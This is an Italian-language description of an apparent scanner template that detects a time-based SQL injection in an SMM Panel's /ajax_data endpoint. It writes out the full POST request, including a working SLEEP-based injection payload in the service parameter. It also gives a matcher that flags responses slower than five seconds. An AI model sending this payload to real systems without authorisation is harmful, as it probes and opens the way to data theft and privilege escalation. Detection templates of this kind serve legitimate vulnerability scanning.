
Template di rilevamento di SQL injection basato su tempo per SMM Panel. Invia richieste POST create appositamente a `/ajax_data` e identifica endpoint vulnerabili tramite analisi del ritardo delle risposte.
Rilevamento di SQL Injection basata sul tempo per SMM Panel
Questo template rileva una vulnerabilità di SQL Injection basata sul tempo nel parametro service_detail del pannello SMM tramite richieste HTTP POST a /ajax_data. Lo sfruttamento può consentire a un attaccante remoto di accedere a dati sensibili o di eseguire escalation dei privilegi.
Lo strumento invia una richiesta POST costruita ad arte:
POST /ajax_data
Content-Type: application/x-www-form-urlencoded
action=service_detail&service=1624'XOR(if(now()=sysdate(),SLEEP(5),0))XOR'Z
Se il tempo di risposta è maggiore di 5 secondi, indica un endpoint vulnerabile.
- Method: POST
- Path: {{BaseURL}}/ajax_data
- Headers: Content-Type: application/x-www-form-urlencoded
- Body: action=service_detail&service=1624'XOR(if(now()=sysdate(),SLEEP(5),0))XOR'Z
- Matcher: duration > 5 seconds
